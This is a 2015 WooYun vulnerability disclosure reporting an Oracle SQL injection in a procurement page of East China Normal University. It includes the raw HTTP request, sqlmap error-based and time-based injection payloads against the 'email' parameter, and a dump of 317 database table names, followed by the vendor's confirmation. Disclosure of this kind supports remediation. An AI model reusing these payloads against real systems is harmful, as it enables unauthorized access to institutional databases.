当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152509

漏洞标题:华东师范大学某处oracle报错sql注入

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-11-08 19:46

修复时间:2015-12-25 08:22

公开时间:2015-12-25 08:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

详细说明:

POST /sggl/wsjj/mmzh.jsp HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Referer: http://jingjia.ecnu.edu.cn
Cookie: JSESSIONID=CFCB2542C85EB9F5DB8A9BEFCAFA1BDB
Host: jingjia.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=1&xm=1

21.png

22.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: email=1' AND 8844=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)) AND 'OJmn'='OJmn&xm=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: email=1' AND 2558=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(104)||CHR(108),5) AND 'mcWd'='mcWd&xm=1
---
back-end DBMS: Oracle
Database: ZC
[317 tables]
+--------------------+
| AQCHEN_338 |
| AQCHEN_GXJJ_YQDC |
| AQCHEN_ORG01 |
| AQCHEN_T_SB |
| A_TMP_BH |
| E$_ZC_BM_TEMP |
| E$_ZC_JFB_TEMP |
| E$_ZC_JFKMYE_TEMP |
| E$_ZC_YH_TEMP |
| I$_ZC_BM_TEMP_LOG |
| I$_ZC_JFB_TEMP_LOG |
| I$_ZC_YH_TEMP_LOG |
| PLAN_TABLE |
| RY |
| RYLX |
| SNP_CHECK_TAB |
| SYS_KFRWGL |
| SYS_RYGL |
| T_JCSJ_DM |
| T_XTGL_SJB |
| T_XTGL_SJBZD |
| XLLX |
| ZCLX |
| ZC_AZDD |
| ZC_BDLX |
| ZC_BDSQBDYY |
| ZC_BDSQD |
| ZC_BDSQKP |
| ZC_BDSQLB |
| ZC_BDXZ |
| ZC_BH2SYS_DW |
| ZC_BH2SYS_KCK |
| ZC_BH2SYS_RY |
| ZC_BH2SYS_SJ6 |
| ZC_BH2SYS_SJ7 |
| ZC_BH2SYS_SYMC |
| ZC_BH2SYS_SYXM |
| ZC_BHDZ_BDK |
| ZC_BHDZ_ZJK |
| ZC_BHJJ_BDK |
| ZC_BHJJ_ZJK |
| ZC_BHSB_BDK |
| ZC_BHSB_FJK |
| ZC_BHSB_ZJK |
| ZC_BLZT |
| ZC_BLZTPZ |
| ZC_BM |
| ZC_BMNDJC |
| ZC_BMNDJCCXTJ |
| ZC_BM_20151019 |
| ZC_BM_TEMP |
| ZC_BZD |
| ZC_BZDJFLY |
| ZC_BZDMS |
| ZC_BZDPTCX |
| ZC_BZDPZ |
| ZC_CWRECORD_TEMP |
| ZC_CWZJDJD |
| ZC_CZBMBPZ |
| ZC_CZBZCDL |
| ZC_CZBZCFL |
| ZC_DMZHB |
| ZC_DQKPXX |
| ZC_DQKPXXM200912 |
| ZC_DQKPXXM201012 |
| ZC_DQKPXXM201112 |
| ZC_DQKPXXM201208 |
| ZC_DQKPXXM201212 |
| ZC_DQKPXXM201308 |
| ZC_DQKPXXM201312 |
| ZC_DQKPXXM201408 |
| ZC_DQKPXXM201412 |
| ZC_DQKPXXM201508 |
| ZC_DXQY_GG |
| ZC_DXYQDWFW |
| ZC_DXYQJZRY |
| ZC_DXYQXX |
| ZC_DXYQ_CEJL |
| ZC_DXYQ_CEPJ |
| ZC_DXYQ_DJCSCSSJ |
| ZC_DXYQ_FL |
| ZC_DXYQ_FMZL |
| ZC_DXYQ_HJQK |
| ZC_DXYQ_KFSJD |
| ZC_DXYQ_KFSJDFA |
| ZC_DXYQ_KJCG |
| ZC_DXYQ_LWQK |
| ZC_DXYQ_NDKHB |
| ZC_DXYQ_PXQK |
| ZC_DXYQ_RJH |
| ZC_DXYQ_SC |
| ZC_DXYQ_YJH |
| ZC_DXYQ_YYD |
| ZC_DXYQ_YYDDCYP |
| ZC_DXYQ_YYDYYSJ |
| ZC_DXYQ_YYZTXGJL |
| ZC_DXYQ_ZJH |
| ZC_DXYQ_ZJHMX |
| ZC_EXPORTLIST |
| ZC_FCBZ |
| ZC_FCBZPZ |
| ZC_FCMJ |
| ZC_FCPZ |
| ZC_FCPZBZ |
| ZC_FCPZDL |
| ZC_FCPZXL |
| ZC_FIELDOFTABLE |
| ZC_FJ |
| ZC_FJJY |
| ZC_FJJYKP |
| ZC_FJJYSQ |
| ZC_FJJYSQKP |
| ZC_FJSY |
| ZC_GBZCDL |
| ZC_GBZCFL |
| ZC_GGDMCXTJ |
| ZC_GJDL |
| ZC_GJXL |
| ZC_GNCD |
| ZC_HMDYH |
| ZC_JFB |
| ZC_JFB_TEMP |
| ZC_JFFP |
| ZC_JFKMYE |
| ZC_JFKMYE_TEMP |
| ZC_JFLY |
| ZC_JFYS |
| ZC_JFYSLS |
| ZC_JFZD |
| ZC_JFZKK |
| ZC_JFZL |
| ZC_JGYQSYXY |
| ZC_JKDJB |
| ZC_JKDLGS |
| ZC_JKSBBLQK |
| ZC_JS |
| ZC_JSGNQX |
| ZC_JWZCFL |
| ZC_JYJL |
| ZC_JYSQD |
| ZC_KPBDXX |
| ZC_KPMS |
| ZC_KPPZ |
| ZC_KPTJBB |
| ZC_KPTJBBCX |
| ZC_KPXX |
| ZC_LC |
| ZC_LCJD |
| ZC_LSBZD |
| ZC_LSBZDJFLY |
| ZC_LSJFLY |
| ZC_LSKPXX |
| ZC_LSSGD |
| ZC_LSSGDJFLY |
| ZC_PDHZB |
| ZC_PDJL |
| ZC_PDSJLSB |
| ZC_PEDL |
| ZC_PEPZ |
| ZC_PETJ |
| ZC_PEXL |
| ZC_PJJB |
| ZC_QCPKB |
| ZC_QCPYB |
| ZC_QCSBPZB |
| ZC_QXCXTJ |
| ZC_RWCX |
| ZC_RWSJ |
| ZC_RWSJX |
| ZC_RWZX |
| ZC_RWZXBM |
| ZC_RWZXJD |
| ZC_RY |
| ZC_RYLX |
| ZC_SBBB |
| ZC_SBBBCXTJ |
| ZC_SBBBPZ |
| ZC_SBBBZT |
| ZC_SBBDXZ |
| ZC_SBBDYY |
| ZC_SBD |
| ZC_SBKP |
| ZC_SBQG |
| ZC_SBSJTXJD |
| ZC_SGCYWP |
| ZC_SGD |
| ZC_SGDCGY |
| ZC_SGDJFLY |
| ZC_SGDMS |
| ZC_SGDPZ |
| ZC_SGHT |
| ZC_SGHTFKQK |
| ZC_SGHTJFLY |
| ZC_SGHTPZ |
| ZC_SGHTXGSGD |
| ZC_SGSCDY |
| ZC_SGZB |
| ZC_SGZBFB |
| ZC_SGZBJJD |
| ZC_SGZBJJDMX |
| ZC_SGZBXGSGD |
| ZC_SGZBXGSGD_LSB |
| ZC_SGZBXGSGD_XG |
| ZC_SGZB_BLQK |
| ZC_SGZB_CGPS |
| ZC_SGZB_JDLB |
| ZC_SGZB_JG |
| ZC_SGZB_PBJDZ |
| ZC_SGZB_PBMXXX |
| ZC_SGZB_PBZJ |
| ZC_SGZB_PBZJZ |
| ZC_SGZB_PBZJ_CGXM |
| ZC_SGZB_PBZJ_ZZLW |
| ZC_SGZB_PFB |
| ZC_SGZB_PFBF |
| ZC_SGZB_PFFA |
| ZC_SGZB_PFFA_PFBF |
| ZC_SGZB_TBXX |
| ZC_SGZB_ZHDFB |
| ZC_SHZCFL |
| ZC_SJDX |
| ZC_SJSJRW |
| ZC_SJZD |
| ZC_SJZDBM |
| ZC_SYSGLCXTJ |
| ZC_SYSGLSJ |
| ZC_SYSGLSJMS |
| ZC_SYSKP |
| ZC_SYSKPMS |
| ZC_SYSKPZX |
| ZC_TJBBPZCS |
| ZC_TSHJY |
| ZC_TYBMS |
| ZC_WPCK |
| ZC_WPCKD |
| ZC_WPCKDMX |
| ZC_WPFKDJD |
| ZC_WPFKLYSQD |
| ZC_WPFL |
| ZC_WPFL_TEMP |
| ZC_WPGYDW |
| ZC_WPKC |
| ZC_WPLYSQD |
| ZC_WPLYSQDMX |
| ZC_WPRKD |
| ZC_WPRKDMX |
| ZC_WPRKSQD |
| ZC_WPRKSQDMX |
| ZC_WPSYDJD |
| ZC_WPXX |
| ZC_WPXX_IMP |
| ZC_WPYDJC |
| ZC_WPYDJCMX |
| ZC_WXJL |
| ZC_WXJLKP |
| ZC_WXJLMX |
| ZC_WXSQD |
| ZC_XLLX |
| ZC_XQ |
| ZC_XTCS |
| ZC_XTCS_CLOB |
| ZC_XTGG |
| ZC_XTGGCX |
| ZC_XTGGLM |
| ZC_XTRZ |
| ZC_XTRZ_HISTORY |
| ZC_XTRZ_OPERATE |
| ZC_XTRZ_PZXX |
| ZC_XX |
| ZC_XXBMBM |
| ZC_XXTZ |
| ZC_XXTZ_LS |
| ZC_YH |
| ZC_YHBBQX |
| ZC_YHBMQX |
| ZC_YHBMQXCX |
| ZC_YHXQQX |
| ZC_YHZ |
| ZC_YHZCLXQX |
| ZC_YHZSHJS |
| ZC_YH_TEMP |
| ZC_YQLJ |
| ZC_YSTZ |
| ZC_YSXX |
| ZC_YSXXZQTZ |
| ZC_YSZT |
| ZC_YW |
| ZC_YWBM_SPBEAN |
| ZC_YWDBR |
| ZC_YWDBRSZLOG |
| ZC_YWFJ |
| ZC_YWFJFL |
| ZC_YWFL_BLOB |
| ZC_YWLZ |
| ZC_YWLZGJDCLR |
| ZC_YWLZRZ |
| ZC_YWMXXMCLQK |
| ZC_YXBM |
| ZC_YXJFLY |
| ZC_ZC |
| ZC_ZCBZCXTJ |
| ZC_ZCDL |
| ZC_ZCDLJGXZ |
| ZC_ZCFL |
| ZC_ZCFL1 |
| ZC_ZCGYS |
| ZC_ZCGYSNS |
| ZC_ZCGYSPJ |
| ZC_ZCLX |
| ZC_ZCPTYH |
| ZC_ZCSX |
| ZC_ZDPZ |
| ZC_ZFBKD |
| ZC_ZFJFB |
| ZC_ZFPZ |
| ZWLX |
| ZWLX2 |
+--------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-10 08:22

厂商回复:

通知二级单位处理。

最新状态:

暂无